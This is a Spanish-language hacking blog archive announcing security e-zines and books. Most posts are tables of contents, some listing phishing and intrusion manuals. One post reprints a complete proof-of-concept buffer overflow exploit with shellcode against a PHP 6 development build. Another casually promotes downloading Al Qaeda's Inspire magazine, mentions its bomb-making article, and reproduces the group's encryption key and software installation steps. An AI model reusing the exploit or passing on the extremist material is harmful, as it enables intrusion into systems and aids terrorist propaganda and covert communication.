Mostrando entradas con la etiqueta E-zine. Mostrar todas las entradas
Mostrando entradas con la etiqueta E-zine. Mostrar todas las entradas

4 dic. 2012

Hackers&Developers Revista de Software Libre, Hacking & Programación


Para los amantes del Software Libre, Hacking & Programación e informáticos en general, hace muy poco que se ha publicado una revista (Hackers&Developers), que ya he tenido el placer de leer, y es bastante buena, se centra en lenguajes como PHP y Python, pero también nos habla de diferentes herramientas de código libre para el desarrollo de softaware, eso y mucho más.

Sin más que decir, les dejo con las 2 primeras revistas y su respectivo index:

5 nov. 2012

Hack The Planet Ezine #4


Ha sido publicada la E-zine #4 de Hack The Planet que trae consigo las intruciones de Imageshack y Symantec (el antivirus). Los datos filtrados contienen información de los servidores comprometidos, así como los bugs y sus respectivos exploits utilizados para llevar a cabo el ataque.

 Aquí les dejo el IndeX:

14 jul. 2012

Libro: Offensive Security Lab Exercises

Me he encontrado con un libro bastante bueno, Offensive Security Lab Exercises, el cual es una suerte de bitácora donde enseñan con ejercicios como usar las herramientas que trae Backtrack. Es bastante claro e ilustrativo, aquí dejo el index para que vean los temas que trata:

21 jun. 2012

Los Cuadernos de Hack x Crack (Viejos & Nuevos)


Todo aquel que se inicio hace tiempo en el tema de la seguridad informática (Hacking), se acordaran de los ultra conocidos Cuardernos de Hack x Crack que era en aquel tiempo, hace 10 años, un excelente material en español y muy claro, llegaron a las 30 ediciones y su última versión fue lanzada en septiembre del 2005 (nunca más lanzaron ediciones de estos prometedores cuadernillos por motivos que desconozco)...

Hace ya un tiempo se abrió una comunidad en español sobre esta misma revista donde se hablan principalmente temas de seguridad informática y también han publicado con la ayuda de la comunidad nuevos cuadernos (claro que no son la misma editorial de la vieja Hack x Crack).

15 abr. 2012

Phrack E-zine #68

Hablar de Phrack es hablar de uno de los e-zines más importantes del mundo underground, una publicación con más de 26 años de historia.

Como ya es costumbre, sale esta revista 68 a más de 1 año de la publicación anterior (#67), y trae temas muy interesantes que vale la pena ver. Están en ingles y texto plano como siempre :)

Aquí se las dejo a continuación:

16 sept. 2011

[E-Zine] Bl4ck-P0rtal # 2

La comunidad Bl4ck-P0rtal ha lanzado la segunda versión de su E-Zine...


Se ve bastante bien, se  las dejo para que vean ;) :

17 ago. 2011

[E-zine] World-Intrusion #1


En las comunidades de MundoHacking y C-intrud3rs han realizado una revista la cual me he dado el tiempo de leer, y me ha gustado bastante. Yo siento que está más bien orientada a los que empiezan en el mundo del hacking, lo cual es bueno para la primera entrega, pero esperemos que vayan subiendo el nivel con las próximas entregas, y esperemos que tengan más entregas y no sean como las clásicas E-zines de foros y comunidades que sacan 1 o 2 y se acabó XD. Buena iniciativa y esperemos que siga.

3 may. 2011

Ezine Level-23 I

Level-23 ha sacado una revista, la cual está de verdad muy interesante, trae de todo un poco y está todo muy bien explicado.

Aquí el Index de la Ezine:

Manual Estenografía
Manual Xul
Intrusión a un Router Mediante Telnet
Instalar UbuntuStudio
Telnet y SSH
XSS TUNELING
Introducción a XSS
Curso Básico de Programación en HTML y CSS
Manual Inyección Sql
Arquitectura de Computadores
Manual Phiser Rapidshare 2009
Manual Phiser Megaupload 2009

17 nov. 2010

Phrack celebra su 25 aniversario con un nuevo número

"El mayor truco del Diablo fue convencer al mundo de que nunca existió"  Verbal Kint

25 sept. 2010

[DiosDeLaRed] E-zine #2

Bueno... Hace tiempo que en Diosdelared.com se publicó la segunda E-zine de este foro donde hacen execelentes aportes. En esta E-zine se trata sobre:

  • [Metasploit] Infectando Linux con Troyano.
  • [Metasploit] Sistemas conectados en la misma Red.
  • [Fast-Track + Metasploit] PAYLOAD Automatically Generate.
  • DNS Impersonation.
  • Introducción al HTTP Hacking.
  • Disable_functions & suhosin patch.

Contenidos y Portada:


Descarga E-Zine #2 DiosDeLaRed

Fuente: http://benox.diosdelared.com/

[+] Salu2

18 jul. 2010

Al Qaeda nos enseña a cifrar mensajes

Estaba leyendo la revista Inspire (la nueva revista que sacó Al Qaeda para unir adeptos a su causa terrorista) sólo por curiosidad y me encuentro con varias cosas interesantes tales como "Make a bomb in the kitchen of your Mom" ("Hacer una bomba en la cocina de tu mamá") dónde precisamente enseñan a hacer una bomba casera... Bueno, bueno, después dejó el link de la revista entera si quieren curiosear un poco la revista.

Otro punto que me llamó mucho la atención (y del cual me voy a referir en este post) es un artículo llamado "How to use Asrar al-Mujahideen: Sending & Receiving Encrypted Messages", bueno y en él se plantea que somos espiados día a día ("especialmente nosotros por nuestra religión") y que es necesario poder encriptar nuestros mensajes. Es por eso que ellos (los terroristas, sí, los mismo de las torres gemelas) recomiendan que usemos un software llamado Asrar al-Mujahideen para encriptar nuestros mensajes. El texto es bastante claro (lamentablemente en inglés) con imágenes ilustrativas y no se saltan ningún paso (es a prueba de niños). Se los dejo a continuación para que lo lean:





Ojo! que si quieren mandar un email a Al Qaeda tiene que ser encriptado (o puede que se enojen) y con la llave:
#---Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public
Key 2048 bit---
pyHAvNeRKLqFHJG+LA5hZfEYlSJCYB6zeKc5Bq1F5EwjBuJyt0
9cMJHoSdEv98hVymwhLsOgLzigJHPTfxA0Ani7EWNaZx1hLaRm
/hBmHErTQ6hZFuBiqnZ1WCEf5NbM7r8iKc0JEkryxlT8jehgIo
C2e0/uG35q1cmRudP4eanVKfikQnojeEz3D1bD3iKWZNx7HBhL
2z6YOtfG8sFb8AyjXv8SEHaRHGO37uwlD8UNguxIRwanb5yEYP
bD1bc4XFfy8JJgRNY8xWqAOwDZAciQ9MykgLZDoxxk/fBxm+Ni
x+VRQsxDk9BDg6OYw4hcgqhu1yWItz6858NA9rl7Y2ki78bMZP
J9HXAD3J6OiW9dKXYLE4mhwpe0C9iqfsDNhwepvawL0K8R8sZj
3MnlUAwm8hLjEX794qGPD2cPonp3lxICMddtQRSR3sN23bJOLF
/OOZhU9Shqv3k0rA4YfT3XoqLoeprXucHzXFRX0CCQOdrnFQzG
+49YV1YeTPpv7TtHvLoYxbsI31ieOPogM7/rKXvQRRzZFstkxA
==
#---End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public
Key 2048 bit---

Descargar Asrar al-Mujahideen 2.0

Instalción Asrar al-Mujahideen 2.0:

Doble click sobre asrar2.exe

  1. La Ruta donde se descomprimirá el programa
  2. "Descomprimir" en arabe
  3. Tiene que poner la contraseña 111
  4. "Aceptar" en arabe

      Descarga de la revista "Inspire" entera:
      Peso: 30,3 MB
      Idioma: Inglés
      Formato: PDF
      Páginas:  67
      DOWNLOAD

      [+] Salu2
      [+] ZioneR

      29 may. 2010

      [DiosDeLaRed] E-zine #1

      Bueno... Diosdelared.com es un foro donde hacen muy buenos aportes, es así como hicieron una recopilación de los mejores y sacaron una E-zine bastante buena que la recomiendo al 100%.

      Qué trae? la portada lo dice todo:


      Descarga E-Zine #1 DiosDeLaRed

      Fuente: http://benox.diosdelared.com/

      [+] Salu2

      6 may. 2010

      Revistas de Hakin9 GRATIS

      Hakin9 es una revista que habla de cuestiones relacionadas con la seguridad de los sistemas informáticos; tanto desde el punto de vista de la persona que rompe la seguridad, como desde el punto de vista de la persona que la asegura.
      9v0yr Revistas de Hakin9 GRATIS

      Es publicada en catorce países del mundo y seis idiomas (francesa, italiana, inglesa, alemana, checa y polaca), aunque algunos años atrás dejo de existir su versión en español, la revista sigue siendo un referente en temas de seguridad informática y la mayoría de sus textos son vigentes al día de hoy.

      Para todos los interesados en ojear esta revista, les cuento que ya no será necesario comprarla por megaupload o rapidshared, ya que los directivos de Hakin9 han decidido liberar su versión en ingles al público en general y permiten descargar en PDF su último ejemplar.
      YRSUv Revistas de Hakin9 GRATIS

      En este número gratuito, hablan sobre temas como:
      • Análisis forense en dispositivos móviles
      • Firewalls para principiantes
      • Pentest contra routers ADSL
      • Escribiendo una shellcode para windows con un compilador de C
      • Fraudes con ID’s
      • Modelado de amenazas
      • y como no puede faltar en cada edición, una entrevista a un personaje de la seguridad informática.
      Pueden descargar este número totalmente gratis desde este enlace y suscribirse a su boletín de noticias, para que cada que salga un numero nuevo, te notifiquen al correo.
      Si prefieres la documentación escrita en tu idioma, te dejo un listado con los artículos gratuitos, que se alcanzaron a publicar en la edición española de Hakin9, antes que dejaran de editarla.

      Fuente: http://www.dragonjar.org/

      5 may. 2010

      Buffer Overflow en PHP 6 Dev

      Recientemente fue descubierto un fallo grave de seguridad en la versión de desarrollo de PHP 6, el lenguaje de programación mas utilizado para realizar aplicaciones web.

      p7dDW Buffer Overflow en PHP 6 
Dev
      El problema se encuentra en la funcion str_transliterate() que permite “traducir” un texto de un lenguaje a otro, pero a su vez no valida adecuadamente los parámetros de entrada y permite la ejecución de código por medio de un buffer overflow.

      Les dejo una PoC que explota esta vulnerabilidad sobre servidor Apache, corriendo en Windows XP SP3 y permite ejecutar la calculadora del sistema:

          # Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
          # EDB-ID: 12051
          # CVE-ID: ()
          # OSVDB-ID: ()
          # Author: Pr0T3cT10n
          # Published: 2010-04-04
          # Verified: yes
          # Download Exploit Code
          # Download Vulnerable app
      
          <?php
          error_reporting(0);
          #####################################################################
          ## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
          ## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
          ## Buffer Overflow
          ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
          ## Exploited by TheLeader, Debug
          ## SP. Thanks: HDM
          ## http://www.nullbyte.org.il
          #####################################################################
          ## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
          ## Take a look, 'unicode.semantics' has to be on!
          ## php.ini > unicode.semantics = on
          #####################################################################
          if(ini_get_bool('unicode.semantics')) {
          $buff = str_repeat("u4141", 256);
          $eip = "u1445u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
          $nops = str_repeat("u9090", 20);
      
          # WinExec Calc XP SP3 HEB Unicode-encoded shellcode
          $shellcode = "u02EBu05EBuF9E8uFFFFu33FFu5BC0u4388u8315u11C3uBB53u250Du7C86uD3FFu6163u636Cu414E";
      
          # WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
          # $shellcode = "u02EBu05EBuF9E8uFFFFu33FFu5BC0u4388u8315u11C3uBB53u23ADu7C86uD3FFu6163u636Cu414E";
      
          $exploit = $buff.$eip.$nops.$shellcode;
          str_transliterate(0, $exploit, 0);
          } else {
          exit("Error! 'unicode.semantics' has be on!rn");
          }
      
          function ini_get_bool($a) {
          $b = ini_get($a);
          switch (strtolower($b)) {
          case 'on':
          case 'yes':
          case 'true':
          return 'assert.active' !== $a;
          case 'stdout':
          case 'stderr':
          return 'display_errors' === $a;
          default:
          return (bool) (int) $b;
          }
          }
          ?>

      Hay que recordar que esta versión de PHP aun esta en desarrollo, pero no deja de ser inquietante este tipo de problemas de carácter critico, en un lenguaje de programación tan extendido en la red, como lo es PHP.

      Mas Información:
      PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
      Codigo en exploit-db.com

      Fuente: http://www.dragonjar.org/

      17 mar. 2010

      51 artículos de Revista Hakin9

       Aquí una recopilación con 51 de los mejores artículos de la famosa revista de hacking Hackin9:

      Contenido de Articulos:

      • Hakin9 - Abusos de las cadenas de formato
      • Hakin9 - Administrado la Inseguridad Informática
      • Hakin9 - Almacenamos datos confidenciales en GNU/Linux
      • Hakin9 - Análisis del funcionamiento de programas sospechoso
      • Hakin9 - Análisis del tráfico en red
      • Hakin9 - Análisis estático del código ejecutable ELF
      • Hakin9 - Anti-Sniffing, Privacidad y VPN
      • Hakin9 - Ataque man-in-the-middle en Jabber
      • Hakin9 - Ataques avanzados de puerta trasera en Linux
      • Hakin9 - Ataques de tipo HTML injection
      • Hakin9 - Automatizando el proceso de explotación en Linux x86
      • Hakin9 - Blind TCP connection reset
      • Hakin9 - Como se envia un Spam
      • Hakin9 - Conociendo distintos tipos de protocolos
      • Hakin9 - Crear el shellcode polimórfico
      • Hakin9 - Criptografía 30 años despues
      • Hakin9 - Criptografía de Curva Elíptica: Ataque de Rho de Pollard
      • Hakin9 - Defensa contra Fingerprinting de la capa de aplicación
      • Hakin9 - Desarrollo de shellcodes en Python
      • Hakin9 - Desbordamiento de la pila en Linux x86
      • Hakin9 - Desconfianza digital
      • Hakin9 - Detectando backdoors silenciosos
      • Hakin9 - El desvio de los cortafuegos de red
      • Hakin9 - Empleo de errores del mecanismo de mensajes de Windows
      • Hakin9 - Engañamos SPF
      • Hakin9 - Evitamos cortafuegos
      • Hakin9 - Google peligroso búsqueda de datos confidenciales
      • Hakin9 - Hackea Windows Vista
      • Hakin9 - Honeypots - Worm Traps
      • Hakin9 - ICMP redirect
      • Hakin9 - Introducción a las técnicas de Xpath Injection
      • Hakin9 - IPS System Based on Snort
      • Hakin9 - Librería libproc - Punto débil de muchos sistemas
      • Hakin9 - Los ataques DDoS
      • Hakin9 - Network defense
      • Hakin9 - Optimización de los shellcodes en Linux
      • Hakin9 - Oracle desde el punto de vista del intruso
      • Hakin9 - Pharming DNS cache poisoning
      • Hakin9 - Port-knocking con SendIP y TCPDump
      • Hakin9 - Problemas con autenticación HTTP
      • Hakin9 - SEC for Real-time Security Log Monitoring
      • Hakin9 - Seguridad VoIP Protocolos SIP y RTP
      • Hakin9 - Seguridad WiFi - WEP, WPA y WPA2
      • Hakin9 - Seleccionadas técnicas de omitir cortafuegos
      • Hakin9 - Smart Spoofing
      • Hakin9 - Sniffing en redes conmutadas
      • Hakin9 - SQL Injection Attacks
      • Hakin9 - Trucos comerciales de los spammers
      • Hakin9 - Uso impropio de Usenet
      • Hakin9 - Utilizando Snort_inline
      • Hakin9 - Wardriving

      DESCARGA

      Fuente: http://foro.latinohack.com/

      18 nov. 2009

      Una al día: 11 años de seguridad informática


      "Una al día: 11 años de seguridad informática" invita al lector a realizar un recorrido por los hechos más destacados desde el nacimiento del boletín de Hispasec a nuestros días. Bajo una perspectiva amena y entretenida, abarca desde las noticias más relevantes de ámbito general ocurridas en el mundo pasando por los hitos y anécdotas más destacadas en el campo de la seguridad informática.
      A modo de anuario, a capítulo por año, el libro ofrece una visión global desde una perspectiva histórica, incluyendo entrevistas para la ocasión con las figuras más relevantes de los últimos once años: Bruce Schneider, Eugene Kaspersky, Johannes Ullrich, Juan Carlos G. Cuartango, Mikel Urizarbarrena... Por último, se han seleccionado algunas de las mejores Una al día de todos los tiempos, que reflejan el estado de la seguridad en el momento en el que fueron redactadas.

      ¿Es el mismo libro que se vendía el año pasado?

      Básicamente, sí. Se le ha añadido el año 2009 (el anterior abarcaba desde 1998 hasta 2008) y se han corregido algunos errores. Si lo compraste entonces, no merece la pena volverlo a a comprar, puedes descargarlo libremente. El libro que puede comprarse es el mismo que está disponible para descarga.

      ¿Es una recopilación de Una al día?

      No. Incluye algunas, las más relevantes o interesantes. El libro está compuesto por material nuevo, redactado desde la perspectiva del tiempo. Además de las entrevistas y las anécdotas propias de Hispasec.

      ¿De qué va el libro entonces?

      Se trata de un anuario de seguridad informática, centrado en los ultimos once años: desde 1998 hasta 2009. Once años de Una al día y de noticias de seguridad informática reunidos por año. También incluye entrevistas exclusivas a los personajes más relevantes de cada momento en el mundo de la seguridad: Bruce Schneier, Eugene Kaspersky, Cuartango, Mikel Urizarbarrena, Jorge Ramió, Johannes Ullrih, Merce Molist, Hector Montenegro, Juan Salom... Además de noticias y anécdotas relevantes de cada año, fuera del ámbito de la seguridad informática. Por último, se han reproducido las mejores Una al día de todos los tiempos, las que mejor reflejan el estado de la seguridad en el momento en el que fueron redactadas.

      ¿Cómo está construido el libro?

      Cada año representa un capítulo. Cada año a su vez se divide en cuatro secciones: "Durante ese año..." donde se sitúa históricamente al lector con noticias mundialmente relevantes no necesariamente vinculadas con la seguridad informática. "En seguridad informática... " se realiza un repaso por las noticias, anécdotas, tendencias y todo tipo de hechos relevantes de la seguridad informática que tuvieron lugar durante ese año, vistos con las perspectiva del tiempo transcurrido. "Una al día": donde se reproducen los cuatro o cinco mejores boletines de cada año, y con el que se complementa la visión global de la seguridad de ese periodo. "Entrevistas" donde se han conseguido entrevistas con los personajes más relevantes de la seguridad informática de cada momento, realizadas para la ocasión.

      ¿Se puede descargar libremente el libro?

      Sí. A través del enlace de la derecha se puede descargar el libro en PDF. Son aproximadamente 30 megabytes. La descarga es totalmente gratuita y no es necesario registro alguno. Si se desea, también se puede comprar en papel.

      ¿Cómo se puede comprar el libro?

      Hemos decidido externalizar el proceso de ventas e impresión. No nos vamos a ocupar directamente ni de la impresión ni de la distribución de las copias. Tampoco de la gestión del cobro. Hemos confiado en una compañía internacional con buena reputación y una larga trayectoria para aprovechar la impresión bajo demanda que permite la web 2.0. Se trata de Lulu.com, una librería web de impresión bajo demanda, con una plataforma de pago propia, segura, y una red de envío muy eficaz. Aceptan Visa, MasterCard, Discover, American Express y PayPal.

      Toda la ayuda está disponible en:

      Descargar Libro

      Fuente y web oficial: http://www.hispasec.com/

      14 oct. 2009

      E-zine #4 DragonJAR



      La Comunidad DragonJAR cada cierto tiempo saca una E-zine con artículos referente a la computación y la seguridad informática muy completa, en esta ocación el E-zine trata 6 temas, aunque parece poco, los temas están muy bien explicados y se prolongan por 61 páginas... Los articúlos tratados son:
      • Aprovechando WebMin
      • Base64 en lapiz papel y calculadora
      • Columna de Opinion
      • Analisis Basico de Malware
      • Campus Party 2009
      • ISO 27001 una Vision General
      Recomiendo su lectura 100%...

      Pagina oficial: http://www.dragonjar.org/

      3 sept. 2009

      SET 37 On-Line

      Saqueadores Edición Técnica, E-zine de hacking on-line, cada cierto tiempo saca boletines de (In)seguridad informática con información del más alto nivel...


      Sin más que decir, dejo los contenidos de la edición 37 de esta E-zine:
      • Contenidos
      • Editorial
      • Jugando con Frame Pointer
      • Bazar de SET
      • Tecnica Ret-onto-Ret
      • Tecnica de Murat
      • Overflow de Enteros blackngel
      • Un Exploit Automatico
      • Explotando Format Strings
      • Metodos Return Into To Libc
      • Ingenieria Social y Estafas
      • Curso de Electronica 08
      • Programando Shellcodes IA32
      • Proyectos, peticiones, avisos
      • Nmap en el Punto de Mira
      • Heap Overflows en Linux: I
      • Analisis CrackMe en Linux
      • Llaves PGP
      Descarga en texto plano
      Descarga en PDF

      Fuente: http://www.set-ezine.org/